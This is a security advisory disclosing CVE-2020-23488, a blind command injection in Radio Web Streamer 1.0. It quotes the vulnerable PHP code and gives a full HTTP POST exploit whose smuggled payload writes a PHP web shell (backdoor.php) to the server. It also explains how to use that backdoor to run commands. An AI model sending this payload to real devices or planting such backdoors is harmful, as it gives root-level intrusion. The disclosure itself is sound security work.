L.E.F. srl – Radio Web Streamer – v1.0 – Blind Command Injection

Title L.E.F. srl – Radio Web Streamer – v1.0 – Blind Command Injection
Discovery date 29/05/2020
Release date 25/02/2021
Credits Francesco Marano
Affected products Radio Web Streamer, version 1.0
Class Parameter Injection, Command Injection, Remote Command Execution

Disclosure timeline

29/05/2020 Request for CVE ID
27/06/2020 Additional info sent to mitre
25/02/2021 CVE-2020-23488 released

Vulnerability details

Blind Command Injection in L.E.F. srl Radio Web Streamer 1.0 allows an authenticated attacker to execute arbitrary command on the target system via specially crafted HTTP POST request. No output will be given on the attacker side.

The /api/volumeAudioHandler/setVolume.php set audio volume using the following excerpt of PHP code:

$data = json_decode(file_get_contents("php://input"),1);
    $vol = $data['data'];
    $command="sudo -u root /usr/bin/amixer set PCM ".$vol."%";

    exec( $command,$output,$retval);
    $response["res"]=false;
    $response["msg"]="Operazione fallita. Riprovare";
    if ($retval==0){

        $response["res"]=true;
        $response["msg"]="Operazione avvenuta con successo";

    }
    echo json_encode($response);

As you can see, the $vol parameter comes unsanitized from user input and it is used in a call to exec(). Based on the command return code the output is "Operazione avvenuta con successo" if zero, "Operazione fallita. Riprovare"
otherwise.

Since the user input is not escaped, it is possible for an attacker to concatenate OS commands by using a payload like 100%; <command> #. This will result in the execution of the following command:

sudo -u root /usr/bin/amixer set PCM 100%; <command> #%

The audio volume is correctly set to 100%, then is executed and the "%" part is just commented out.

Since the attacker cannot see the output, but the return code, this vulnerability could be used to blindly write a web shell on the target machine to run commands with command output too.

A malicious HTTP POST request to create a web shell is:

POST /api/volumeAudioHandler/setVolume.php HTTP/1.1
Host: <target>
Referer: http://<target>/(homeRouter:streamConfigurator)
Content-Type: application/json; charset=utf-8
Authorization: Bearer *REDACTED*
Content-Length: 74

{"data":"100%; echo '<?php system($_GET[\"c\"]); ?>' > /var/www/html/backdoor.php #"}

If the response page contains the "Operazione avvenuta con successo" string the attacker can run arbitrary commands on the target machine with output by just sending HTTP GET requests from a browser visiting the following link:

http:///backdoor.php?c=

where can be any non-interactive OS command.